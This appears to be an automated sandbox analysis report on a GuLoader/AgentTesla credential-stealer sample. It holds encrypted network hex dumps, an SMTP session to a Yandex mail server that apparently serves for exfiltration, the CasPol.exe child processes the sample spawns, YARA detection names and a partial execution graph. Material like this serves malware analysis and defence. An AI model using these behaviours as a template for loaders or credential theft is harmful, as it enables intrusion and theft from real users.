                                                                                                  2021-12-14 15:13:05 UTC207INData Raw: a8 fa 4e 7f 8b d2 a1 87 c9 27 be e6 b9 48 9f e6 be 76 9c 9d 74 d1 35 cc be cf 8b 56 d6 cb c8 0d 2b c8 4d 42 23 37 4d d3 fe 30 fb d3 bf df a9 1b 55 1e 75 55 81 f4 6e 98 73 4a 05 5f a7 56 49 b3 d2 41 be 32 9b 35 72 e4 da a3 62 63 46 bd 3f 56 2e bd e9 86 a5 63 23 91 59 b4 cd 44 e8 79 9c 8a f4 20 b6 41 db 77 e3 cf df 21 41 c5 ac 27 12 af 94 56 c0 c3 62 0c b2 c2 a4 02 74 e6 5a 44 b2 23 c7 98 63 54 74 ff 5d 5f 4a 60 3f 62 6b 45 8f d8 c1 fa e0 53 07 76 b0 45 2d 1a c3 76 e6 7b c1 05 66 8c e0 6b 13 66 67 b8 9c 2a 07 34 b2 fa bf 1b 91 c6 35 05 5d a4 60 88 50 10 f3 c2 4c 0f 0e 28 2c f9 63 ab 1c 18 75 3e 23 7e db 3d a1 0d 0c ae 3c 01 40 81 5d 1c cd b1 da a7 a7 29 88 c3 85 08 ef 29 e7 38 c6 4a d3 29 b3 5c 1d bb 00 b1 50 8e ef 05 6e 9a f8 7e b3 b1 a4 7f 7f 4f 4b 21 5a
                                                                                                  Data Ascii: N'Hvt5V+MB#7M0UuUnsJ_VIA25rbcF?V.c#YDy Aw!A'VbtZD#cTt]_J`?bkESvE-v{fkfg*45]`PL(,cu>#~=<@]))8J)\Pn~OK!Z
                                                                                                  2021-12-14 15:13:05 UTC208INData Raw: e7 89 3c 98 c2 8b 24 ee 24 6a ab 89 67 7e 18 e6 cc 6e ba 32 dd 83 4f 5f 6d 4b 2b 79 17 0b 02 15 87 46 dd ea ea c3 ef 80 33 6d 82 47 5e 24 16 f6 b7 cd 29 ea 44 99 98 db c3 96 a7 73 e6 5a 4a ee 59 74 37 f2 4c 8b 97 32 2d ed 86 9d 43 8e e1 2a 03 4f 98 07 e2 4a 73 17 64 dd 12 4a 14 f7 ae c2 ad 3d 5e af 5d 56 1e c4 fc 6b 93 fe 0a b0 24 66 b5 0e ef b6 39 08 7a b6 b6 22 99 1f e5 05 e3 b3 43 04 09 ea 70 ac ec 2a ee ab 35 b3 0a 0e 1d 8d e8 5d b9 b9 88 ba 6e 00 5a 8e 49 52 72 fb a7 12 5a 02 9a 6a 76 1c 65 d6 81 ea eb 0b 85 03 dd 5b f7 e7 79 83 e8 20 a1 c2 8a 01 0c 57 a6 ce ee 8b 1c 31 9a 43 ad 44 a7 f2 d1 cf 5a cf 4f b8 b8 d9 16 94 e2 50 33 f1 19 82 d4 1a 3e 47 49 07 31 5a 2d 5a 9c 34 63 f2 8a f5 8f 37 14 8a bc 9d 51 15 b9 85 a1 da 00 cd c9 c1 c7 e0 25 1b 54 03 aa
                                                                                                  Data Ascii: <$$jg~n2O_mK+yF3mG^$)DsZJYt7L2-C*OJsdJ=^]Vk$f9z"Cp*5]nZIRrZjve[y W1CDZOP3>GI1Z-Z4c7Q%T
                                                                                                  2021-12-14 15:13:05 UTC209INData Raw: cf 3b 0f fd f9 c9 5c c4 97 81 9b 99 07 cf 0c 6d 99 bb 24 2e b6 e1 3b a9 ba 9f 0d 29 6b b4 e4 94 d0 41 a3 cf 8f 21 03 85 bb c6 f7 96 62 d9 8e de 3d f2 80 3e ae d3 eb 0d bf 4b 8c be b9 de 3a b0 4b 18 7b 4c 8b 23 28 18 56 3e a7 93 4a fd a0 d9 aa f8 40 24 7c 07 16 e7 9f 11 6c d6 1e 66 2f 89 3c 00 d4 ae 58 b0 63 f3 61 00 a6 b8 d6 03 0d 33 b5 62 29 5a ca 90 e6 9a 0a 46 ff 39 dd a1 2c 8d 17 fa 0a 6d 48 fa 04 a5 92 4b ae b1 54 4c 8a db 53 73 d0 ec 3c a3 a3 04 8c 3a be 52 ba 14 09 e1 3b 57 94 bd 9e 3b 38 0a 3b ef 32 3a 0d 5a 1e 9f a0 ee 9d b4 a4 a2 b2 90 17 fe 30 2c 55 a3 22 b6 08 33 b1 0d d8 e0 1e f6 c7 3e db e8 59 67 d1 09 9d b8 5a d3 03 96 73 8d 1a 1b 66 f1 0d 91 b5 b8 a1 4a 5b 47 9b 2f ee 78 76 05 52 4b 1e be bd 33 79 f8 08 7b 6e 34 e7 35 1b 8a d7 a6 e5 f6 48
                                                                                                  Data Ascii: ;\m$.;)kA!b=>K:K{L#(V>J@$|lf/<Xca3b)ZF9,mHKTLSs<:R;W;8;2:Z0,U"3>YgZsfJ[G/xvRK3y{n45H
                                                                                                  2021-12-14 15:13:05 UTC210INData Raw: 6b 91 64 2e 02 fb e3 1c e2 7c da 90 fc e7 84 a6 f4 6d 13 3a 1a cc 36 dc 15 e9 00 87 cf 9a 6b d7 22 92 74 4e 27 f3 5a a4 18 4b 30 1b 46 68 13 d6 c5 06 10 a9 24 37 62 0f af 57 9a fe 7d 54 e9 d7 e7 0a d5 48 40 ed f4 38 42 96 ed 17 71 60 51 fc 81 63 ee 75 08 f0 67 58 d2 eb 7e 18 e2 df 3e b1 fd 72 66 91 2f ea 08 66 4e a7 51 08 d0 d2 89 61 b0 3a b4 7f aa 94 5b 06 59 f8 4e e1 96 da 87 5f bb 04 05 72 17 ef 6a 51 b8 0c ba 90 ac eb 38 c8 45 d7 39 13 f3 ff c0 4a d6 16 1e 9c 87 04 c9 02 60 8b a2 19 30 aa f3 24 ba 88 1f 81 3a f5 31 e5 94 d0 53 ae c1 89 22 08 89 a9 d8 f1 90 73 da 81 c6 3d ef 94 9e 3d dc e6 1e bf 50 9e d8 a0 e2 26 a0 cf 85 7f 4e 96 33 2a 70 53 2b b4 13 c9 fa be da be e4 cf ab 7a 19 14 66 31 07 af 7d 08 72 bc 7d 3b 35 c4 3d 71 bd 6f f8 43 0c a9 aa df 15
                                                                                                  Data Ascii: kd.|m:6k"tN'ZK0Fh$7bW}TH@8Bq`QcugX~>rf/fNQa:[YN_rjQ8E9J`0$:1S"s==P&N3*pS+zf1}r};5=qoC
                                                                                                  2021-12-14 15:13:05 UTC211INData Raw: 7c 88 18 f0 d4 c6 89 4a 05 0e 45 2e d6 65 e0 04 1e 19 e9 02 a1 bc 78 98 df 5e 2f 8a 3c c9 05 b1 fc 8a 04 1f 8e 10 00 71 e0 b3 3b f2 83 78 8a 8b 92 5e 4e a8 1d 9e f7 8e c4 da c2 e1 93 5d 0b 5d 64 ea 4e 36 d5 7c 20 bd 17 ed f7 a8 a2 34 c8 63 57 de 92 99 43 43 56 35 5f e4 a5 e4 9b 81 f1 d6 0e 67 c7 95 5a 1a 89 aa f8 23 5b ad b9 ab f9 72 2d c8 08 98 b7 d5 bf 4e c3 85 f0 81 ab 43 09 82 0b b2 53 31 df 48 a1 a9 82 c5 20 bb 43 5c 8a 26 24 42 b0 12 fa 21 4e 6e dd ed 88 f0 29 c2 5c 93 38 cc 96 de 5b 93 c2 aa 9a b8 a7 2d 57 10 d8 c7 d0 0b 46 55 9b df 5c fc c7 d1 49 94 48 0b 5d ee 03 30 73 82 c9 1a 41 3f a8 78 42 11 11 25 5a 01 7f 38 54 7e ea 2e aa 91 1c a7 dc c6 5c 11 ef 36 23 c1 71 8a c2 ab 42 83 24 dc ee 85 91 e5 c7 17 86 38 24 82 4b b1 5b 84 07 fd ef 54 45 9c e6
                                                                                                  Data Ascii: |JE.ex^/<q;x^N]]dN6| 4cWCCV5_gZ#[r-NCS1H C\&$B!Nn)\8[-WFU\IH]0sA?xB%Z8T~.\6#qB$8$K[TE
                                                                                                  2021-12-14 15:13:05 UTC213INData Raw: a4 eb b0 b2 cf a6 9e 74 50 38 78 c5 52 3c 9b 3d 94 6d 3e d2 53 99 93 bd 85 c2 2d 90 6f 34 1d b9 26 72 b5 4c 84 64 2d ae fc ed 10 f5 40 c6 81 ed 64 3b b8 e3 6a 01 29 74 da 20 5f aa ef 2e 88 c5 93 7b c2 aa bb 74 4f 42 f5 4f c7 0a 43 3e 84 53 77 1f c5 d7 18 0d a0 36 25 65 2b 23 fb 84 ed 7d 41 e6 ec f3 0f d4 46 4f e9 fa 40 5f 90 f7 0b 60 54 51 ef 93 6c e7 6d 0f d7 fb c3 d1 f5 63 1e f1 41 99 96 9a 7d fb 2d 27 d7 1b 41 ce 1c 55 0a f3 c0 1a 62 1f bc 41 6c d1 10 9a 0c 5d e5 4a f2 81 d3 84 44 a1 04 05 72 03 ef 7a 4c aa 1e ae 90 be fe 09 d2 49 df 29 8c 6a f6 d5 de 84 82 9d 1c 00 05 cf 17 71 16 27 05 3e 36 bd 2d a1 94 8c 8c 9b e5 23 89 bc cc 45 bc 48 cf 30 62 83 a8 ca fb 9c 63 d8 91 5a f4 ef 83 3c f2 c1 eb 2d bf 44 1e 4a b1 fe 39 b7 d9 04 e7 4d 98 a3 7a 7f 5c 30 aa
                                                                                                  Data Ascii: tP8xR<=m>S-o4&rLd-@d;j)t _.{tOBOC>Sw6%e+#}AFO@_`TQlmcA}-'AUbAl]JDrzLI)jq'>6-#EH0bcZ<-DJ9Mz\0
                                                                                                  2021-12-14 15:13:05 UTC214INData Raw: 76 7b 24 6c 2c 1e a4 c6 2f b8 f7 60 eb bb c7 73 9d 4d 9d 25 84 33 b5 e8 fa 21 7d 91 72 c1 23 e6 f2 5c 1d fc b0 3d d2 c6 56 3e 62 08 33 43 3f d4 7e f8 09 0a 08 f5 1b a0 a4 67 95 c4 7b 25 9a b0 e5 04 bc 9a 8c 05 07 9f 25 0e 6c f5 a9 30 f2 94 50 86 83 9e 4b 4e a6 02 9e f1 8e f5 dd db e9 84 d2 95 5b 75 7a 8e bf c5 f5 a4 bb 0b 71 b2 bb bb 27 c3 76 4f d5 80 97 df 46 58 bf 57 f8 3b e9 9a 90 6d 8a 01 12 d2 8a 5b 01 96 b2 c4 3f 49 ad b8 ae e4 75 39 4a b3 8a a5 ef 8d 59 d6 95 6c 1d a4 5f 8f c5 1d bd d7 b5 db 52 28 e9 88 c4 2b ba 48 4f 9d fc 26 66 b7 81 38 20 44 72 ba ea 1b d3 28 c8 59 9d 36 ca 85 d5 48 9e c4 a6 1d fd a7 30 51 04 ca db 43 a8 03 4e 9e c1 57 ef ca d1 45 89 4c 1a d7 ff 1e 34 73 9c c4 08 c7 33 aa f4 47 04 1a 30 58 1a 72 2b 5f 78 ec 3b b8 84 95 af d3 42
                                                                                                  Data Ascii: v{$l,/`sM%3!}r#\=V>b3C?~g{%%l0PKN[uzq'vOFXW;m[?Iu9JYl_R(+HO&f8 Dr(Y6H0QCNWEL4s3G0Xr+_x;B
                                                                                                  2021-12-14 15:13:05 UTC215INData Raw: 6a e7 99 2c 44 ec 76 fa a8 58 64 3f 26 73 4a 26 57 2b 81 5b 0e 9b dd be e6 55 1c e1 dd e1 35 1d ed f0 c2 b4 67 b7 99 c6 ba 85 68 df bc 77 d9 dd 69 84 b1 30 7d b1 45 5a 96 1c f6 ab cc 36 9f e3 91 02 af 2e 7c b1 56 94 7e bd 82 be f1 77 f6 68 cc 93 f4 e8 84 b4 fe 62 1c 20 7b d4 36 d1 07 ff a2 b3 c3 89 7c cd 2e 93 63 dd 24 6a 55 c8 19 53 3e 84 47 68 14 d9 b0 11 10 ac 24 36 75 27 a4 5b 81 eb 7d 41 e6 e1 e8 8a 50 46 5c e2 fa aa 7b 8c 98 0e 43 55 4d 62 a4 74 c0 6d 12 d8 7f 52 d8 e6 7d 18 e6 e3 2d 85 ee 6c 7e 8b 23 eb 12 57 4c a4 47 01 fc c7 02 f5 b0 3b f8 6c d1 13 1b 16 3c eb 5e fd 0e 44 8a 51 26 51 19 fd 88 6f 34 5f b1 01 24 3c b2 f8 31 c7 db c3 39 03 fd e2 d6 dd 75 95 81 93 90 03 c4 0c 71 16 23 0c 24 bf fb 03 ae 88 1f 91 38 e1 36 e6 bc cc 45 b3 cc 81 2a 03 8d
                                                                                                  Data Ascii: j,DvXd?&sJ&W+[U5ghwi0}EZ6.|V~whb {6|.c$jUS>Gh$6u'[}APF\{CUMbtmR}-l~#WLG;l<^DQ&Qo4_$<19uq#$86E*
                                                                                                  2021-12-14 15:13:05 UTC216INData Raw: 0e 27 56 c4 83 5b 61 09 cd 09 e6 24 14 93 a7 38 50 46 a8 4c 98 0f ea 74 6d a5 cd 4e 50 af 3d c6 6c 78 f3 7f 6e 31 ef 2d 1c aa d0 ae e8 f3 40 ef a7 c6 67 9a 43 63 38 81 2f a3 6a d4 3d 6f fc 6f 34 3e fa ed 46 07 fc bf 16 d5 d2 c9 1a ff a1 2b 40 2e c2 f8 4d 0a 11 11 e1 0e b4 b1 61 bd c3 53 2f 96 b9 f2 03 b8 92 82 18 06 88 18 08 79 e1 b1 1e ed 8c 6d 87 87 ba 57 49 a2 18 9c fc 8d ca d2 cb f4 93 73 0e 51 6f f3 db ad c7 7f 3a b2 04 fa fa bf bb 23 d1 76 55 c1 0d 04 56 4e 4c bf 4e d6 26 f4 8d 89 ec c8 02 f8 5b 86 db 9d 9b 2c 59 24 55 b1 b2 b8 67 f6 2f ce 1b 07 2a ce 8a 4a cb 96 6e 05 b4 ce 8f 83 08 ae 51 3d 59 c1 a2 a9 82 ca a7 a3 54 c3 8a 6c a1 6d a1 1d 69 a8 e0 64 d3 f9 91 6e 26 c0 53 96 21 47 0a c2 41 82 ce bc 83 b8 a7 2d 43 8c 60 dd 4e 20 52 42 94 de 51 e6 c5
                                                                                                  Data Ascii: 'V[a$8PFLtmNP=lxn1-@gCc8/j=oo4>F+@.MaS/ymWIsQo:#vUVNLN&[,Y$Ug/*JnQ=YTlmidn&S!GA-C`N RBQ
                                                                                                  2021-12-14 15:13:05 UTC218INData Raw: 06 ab be 7a aa ad 08 8e c1 18 80 62 9c 77 37 c5 ad 90 46 9d 52 e4 b1 2d 4c e3 82 a6 2e ca b8 8b 35 c6 bc 76 f2 0d c6 58 71 ab f6 20 bc 6e 2a 29 6c 50 ae b3 31 1c a2 0d a6 d1 a4 6e ab 64 69 3d e7 26 1b ee f7 c2 a4 e9 55 b8 d1 88 95 68 de c9 67 4b b4 27 98 3f f0 7e b1 e5 55 8c 9a b4 b7 42 d4 90 6d 75 0d ad 2a 7c ba 45 99 78 b2 0d f0 ed 1d f6 7d c8 9c e1 e8 83 9a f4 6b 03 a8 9b c1 3f d3 13 ea 26 8f c4 9c 73 d8 23 a6 61 dd ae fa 5a 4c 9d 57 3e 86 b6 60 03 4a 40 17 02 2e d4 2c 7a 33 b3 cb f3 e1 74 4e f1 eb f3 0f d8 59 c0 de e1 3b c2 72 f7 0b 61 52 42 e4 95 74 c0 68 0f d7 fb c3 d1 e9 fe fc ef c4 2b 86 fd 6d 66 91 3d ea 06 4e 4e a2 5b 0d d2 ce 19 61 9b bd 41 6f c1 80 db e8 56 ec 6b ed 8d cf 0b af b5 91 c2 ff 9d e8 69 54 ae 12 b4 0d 65 eb 21 dd 5e ea 39 07 f9 e6
                                                                                                  Data Ascii: zbw7FR-L.5vXq n*)lP1ndi=&UhgK'?~UBmu*|Ex}k?&s#aZLW>`J@.,z3tNY;raRBth+mf=NN[aAoVkiTe!^9
                                                                                                  2021-12-14 15:13:05 UTC219INData Raw: 48 8d 17 4e c8 bc b4 b0 a2 b3 ec 12 cc b0 25 7e a1 0d a4 9b 2e 6e 1a 79 7d 09 73 17 2a 7a e1 49 f4 55 d4 93 ba 5a dc 86 53 7c 08 de 18 67 81 11 86 26 30 57 62 45 5d 19 92 e0 6e 7b 05 53 58 91 32 35 ce 60 6d e0 fe cb 34 fd a8 14 af fc ae e9 72 44 e1 80 c6 72 88 c6 0a 39 93 ae af 6e dd 2f ed c5 64 e4 3a fb fd c2 3d e3 bc 00 d5 dc de 0c 79 05 33 43 2e d6 70 ed 04 15 1f e8 0e b6 a9 64 9f dc 5b 37 85 be e6 01 b4 ba 88 19 1e 85 1e 0c 02 e9 dc 3e 8e 86 50 8f b2 9a 64 4b be 18 95 e4 83 dc df df e0 9e 5b 11 46 7a e7 d3 a8 df 7c 21 a7 05 f8 f6 b5 a6 2c d1 7b 72 d1 93 80 5c 56 43 bf 56 eb 22 e8 9a 9f f0 d7 0f 66 c6 8a 5d 14 8e a9 ca a6 54 b5 ba a9 f6 f3 2a ce 0d 86 b6 c2 98 21 c9 a7 ee 99 a0 50 0b 98 0d b2 53 26 dd 46 b4 ac 9d dd 2b ae 4e 49 85 7e 20 6d ab 11 fc 2d
                                                                                                  Data Ascii: HN%~.ny}s*zIUZS|g&0WbE]n{SX25`m4rDr9n/d:=y3C.pd[7>PdK[Fz|!,{r\VCV"f]T*!PS&F+NI~ m-
                                                                                                  2021-12-14 15:13:05 UTC220INData Raw: 30 de 0e 20 3a e8 f3 34 b7 d5 8f c0 0f 74 33 e1 27 7c 84 90 29 7e 3b 76 ef 0f 57 6f 3f 94 9a 84 e3 79 92 03 dd 3e c5 b8 44 ec f0 41 a8 92 ab 78 11 3e a3 af ed c6 79 5c 2d 30 d4 44 e5 80 84 ae 1e aa 3b d1 fa bc 45 e0 b9 22 28 f1 4e e7 a0 45 40 22 2c 6e 43 2e 19 23 f5 53 6a 86 b0 b6 aa 47 10 e9 a6 e9 4b 15 9a f0 a9 b6 19 b9 c4 c1 c1 90 15 5e 4b 76 cb 5c 29 8a 9f 25 6f 30 ec 5b 8c 9d b7 a5 84 38 eb ed f5 1f cf 26 37 b4 2e 91 04 af 70 fe 8a 1e 91 60 a8 94 fc e6 8a ba c0 6a 3c 28 43 cf 1f dd 2b ed 0e 86 fd 94 79 d0 4f 8e 44 cf a7 ef 01 cd 6a 56 58 06 3f 75 63 cb b7 16 71 ae 54 2b 3e 3a c0 4a eb e3 16 49 fb e2 92 08 86 48 32 e7 a7 29 05 9e 95 0b 16 55 1a e1 c4 7e 91 68 6d c5 3d 5a b6 fb 27 10 a4 c3 7e 84 ab 6f 09 8c 43 f7 42 53 35 a5 10 0f 81 c0 5d e0 cd ba 0c
                                                                                                  Data Ascii: 0 :4t3'|)~;vWo?y>DAx>y\-0D;E"(NE@",nC.#SjGK^Kv\)%o0[8&7.p`j<(C+yODjVX?ucqT+>:JIH2)U~hm=Z'~oCBS5]
                                                                                                  2021-12-14 15:13:05 UTC221INData Raw: aa b1 55 41 84 d8 53 73 cc fc 3b a5 ad 16 0c f7 ac d2 6b 06 89 34 29 d7 4d b3 98 3b 39 18 bb 32 3c 3f 0d 5a 0c 1f 45 e8 bd b5 a5 b0 32 75 13 de 31 2d 5d a6 02 b6 1a b3 60 08 f8 e0 0c 76 12 38 fb e9 58 75 51 dc 8e bf 52 c1 83 5b 61 0d cb 09 e6 24 10 94 a7 38 50 42 47 4f 98 0f ee 72 7c 25 51 4a 10 af 3d c6 68 78 f1 7f 6e 35 ef 29 1c aa d4 ae f8 f3 40 eb a8 c6 67 9a 47 93 38 81 2f a7 6a db 3d 6f f8 6f c4 3e fa ef 40 00 fe b9 1d d0 d4 d4 0b 7f 0d 2e 46 33 d3 78 e5 0c 16 15 e9 06 bc b9 65 9d c2 5b 27 9b be f8 01 b2 9a 8a 04 1b 8d 10 00 71 e9 b4 3e ef 86 65 8f 83 9a 56 4b a8 1f 9b f9 86 c1 da c3 fc 96 53 0c 5a 67 fb ce aa d7 74 3d ba 19 f0 f2 b5 a7 29 cd 7e 52 d0 8e 85 5e 46 44 b7 4a f6 27 f5 86 82 ec ca 13 7b da 97 58 1c 8a af d8 22 55 b0 ba a9 e4 77 2b c8 0a
                                                                                                  Data Ascii: UASs;k4)M;92<?ZE2u1-]`v8XuQR[a$8PBGOr|%QJ=hxn5)@gG8/j=oo>@.F3xe['q>eVKSZgt=)~R^FDJ'{X"Uw+


                                                                                                  SMTP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                  Dec 14, 2021 16:14:41.789824963 CET5874977077.88.21.158192.168.11.20220 iva6-2d18925256a6.qloud-c.yandex.net ESMTP (Want to use Yandex.Mail for your domain? Visit http://pdd.yandex.ru) 1639494881-iiPd4ADzn8-EfPihFDn
                                                                                                  Dec 14, 2021 16:14:41.791059017 CET49770587192.168.11.2077.88.21.158EHLO 648351
                                                                                                  Dec 14, 2021 16:14:41.838840008 CET5874977077.88.21.158192.168.11.20250-iva6-2d18925256a6.qloud-c.yandex.net
                                                                                                  250-8BITMIME
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 42991616
                                                                                                  250-STARTTLS
                                                                                                  250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                  250-DSN
                                                                                                  250 ENHANCEDSTATUSCODES
                                                                                                  Dec 14, 2021 16:14:41.839232922 CET49770587192.168.11.2077.88.21.158STARTTLS
                                                                                                  Dec 14, 2021 16:14:41.888082981 CET5874977077.88.21.158192.168.11.20220 Go ahead

                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: G47wmLn8uy.exe PID: 2128 Parent PID: 8932

                                                                                                  General

                                                                                                  Start time:16:11:54
                                                                                                  Start date:14/12/2021
                                                                                                  Path:C:\Users\user\Desktop\G47wmLn8uy.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\G47wmLn8uy.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:167936 bytes
                                                                                                  MD5 hash:9A1518ED709F916360E56B5AC7D76995
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1333152081.0000000002AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: CasPol.exe PID: 4828 Parent PID: 2128

                                                                                                  General

                                                                                                  Start time:16:12:43
                                                                                                  Start date:14/12/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\G47wmLn8uy.exe"
                                                                                                  Imagebase:0x1e0000
                                                                                                  File size:108664 bytes
                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: CasPol.exe PID: 4708 Parent PID: 2128

                                                                                                  General

                                                                                                  Start time:16:12:44
                                                                                                  Start date:14/12/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\G47wmLn8uy.exe"
                                                                                                  Imagebase:0x130000
                                                                                                  File size:108664 bytes
                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: CasPol.exe PID: 4712 Parent PID: 2128

                                                                                                  General

                                                                                                  Start time:16:12:44
                                                                                                  Start date:14/12/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\G47wmLn8uy.exe"
                                                                                                  Imagebase:0x950000
                                                                                                  File size:108664 bytes
                                                                                                  MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000000.1107473483.0000000000D30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.5684637032.000000001DE51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: conhost.exe PID: 4904 Parent PID: 4712

                                                                                                  General

                                                                                                  Start time:16:12:44
                                                                                                  Start date:14/12/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6e34f0000
                                                                                                  File size:875008 bytes
                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Chronological Activities

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >

                                                                                                    Analysis Process: G47wmLn8uy.exe PID: 2128 Parent PID: 8932 G47wmLn8uy.exeCOMMON

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:12.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0.7%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:551
                                                                                                    Total number of Limit Nodes:20

                                                                                                    Graph

                                                                                                    execution_graph 1749 425c02 __vbaChkstk 1750 425c42 13 API calls 1749->1750 1751 425cf7 14 API calls 1750->1751 1752 425db8 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 1750->1752 1751->1752 1754 423002 __vbaChkstk 1755 423044 8 API calls 1754->1755 1756 4230c3 10 API calls 1755->1756 1757 42326b __vbaVarDup #666 __vbaVarTstNe __vbaFreeVarList 1755->1757 1760 423175 __vbaNew2 1756->1760 1763 423190 1756->1763 1758 42349e __vbaFreeStr __vbaAryDestruct __vbaAryDestruct __vbaFreeStr 1757->1758 1759 4232dd 10 API calls 1757->1759 1762 4233a8 __vbaNew2 1759->1762 1764 4233c3 1759->1764 1760->1763 1762->1764 1765 4231ee 1763->1765 1766 4231ce __vbaHresultCheckObj 1763->1766 1767 423421 1764->1767 1768 423401 __vbaHresultCheckObj 1764->1768 1769 42322a __vbaHresultCheckObj 1765->1769 1770 42324d 1765->1770 1766->1765 1771 423480 1767->1771 1772 42345d __vbaHresultCheckObj 1767->1772 1768->1767 1773 423254 __vbaI2I4 __vbaFreeObj 1769->1773 1770->1773 1774 423487 __vbaI2I4 __vbaFreeObj 1771->1774 1772->1774 1773->1757 1774->1758 1963 424da6 __vbaChkstk 1964 424de6 #598 __vbaVarDup #667 __vbaStrMove __vbaFreeVar 1963->1964 1965 424e47 1964->1965 1393 41fa04 __vbaChkstk 1394 41fa4f 1393->1394 1401 41fac7 __vbaChkstk 1394->1401 1402 41fb09 #709 1401->1402 1403 41fb2d 15 API calls 1402->1403 1404 41fbff #575 __vbaStrVarVal 1402->1404 1403->1404 1405 41fc70 __vbaStrMove __vbaFreeStr __vbaFreeVarList __vbaStrCopy __vbaStrCopy 1404->1405 1467 422770 __vbaChkstk #586 #564 1405->1467 1406 41fce7 __vbaStrMove __vbaFreeStrList 1474 4229c1 __vbaChkstk 1406->1474 1407 41fd28 1408 41fd57 __vbaStrCopy 1407->1408 1409 41fd37 __vbaHresultCheckObj 1407->1409 1411 41fde3 1408->1411 1409->1408 1412 41fe12 1411->1412 1413 41fdf2 __vbaHresultCheckObj 1411->1413 1414 41fe19 __vbaFreeStr __vbaVarDup #518 __vbaStrCopy __vbaStrVarVal 1412->1414 1413->1414 1415 41fe99 1414->1415 1416 41fec8 1415->1416 1417 41fea8 __vbaHresultCheckObj 1415->1417 1418 41fecf __vbaFreeStrList __vbaFreeVarList 1416->1418 1417->1418 1481 424074 7 API calls 1418->1481 1419 41ff33 #696 #616 __vbaStrMove __vbaStrCopy __vbaStrMove 1503 424574 __vbaChkstk 1419->1503 1420 41ffd4 1421 420003 1420->1421 1422 41ffe3 __vbaHresultCheckObj 1420->1422 1423 42000a __vbaFreeStrList __vbaLenBstrB __vbaLenBstr 1421->1423 1422->1423 1424 420075 1423->1424 1425 4200a4 1424->1425 1426 420084 __vbaHresultCheckObj 1424->1426 1427 4200ab #648 1425->1427 1426->1427 1428 4200fb 1427->1428 1429 42012a 1428->1429 1430 42010a __vbaHresultCheckObj 1428->1430 1431 420131 __vbaFreeVar #517 __vbaStrMove __vbaStrMove 1429->1431 1430->1431 1432 420197 __vbaFreeStrList 1431->1432 1433 4201c2 1432->1433 1434 4201f1 1433->1434 1435 4201d1 __vbaHresultCheckObj 1433->1435 1436 4201f8 #696 #685 __vbaObjSet 1434->1436 1435->1436 1437 420239 1436->1437 1438 42026a 1437->1438 1439 42024a __vbaHresultCheckObj 1437->1439 1440 420271 __vbaStrCopy 1438->1440 1439->1440 1441 4202cf 1440->1441 1442 4202fe 1441->1442 1443 4202de __vbaHresultCheckObj 1441->1443 1444 420305 __vbaStrMove __vbaFreeStr __vbaFreeObj 1442->1444 1443->1444 1445 420366 1444->1445 1446 420395 1445->1446 1447 420375 __vbaHresultCheckObj 1445->1447 1448 4203f5 1446->1448 1449 4203d5 __vbaHresultCheckObj 1446->1449 1447->1446 1450 4203fc #573 __vbaStrVarMove __vbaStrMove __vbaStrCopy #648 1448->1450 1449->1450 1451 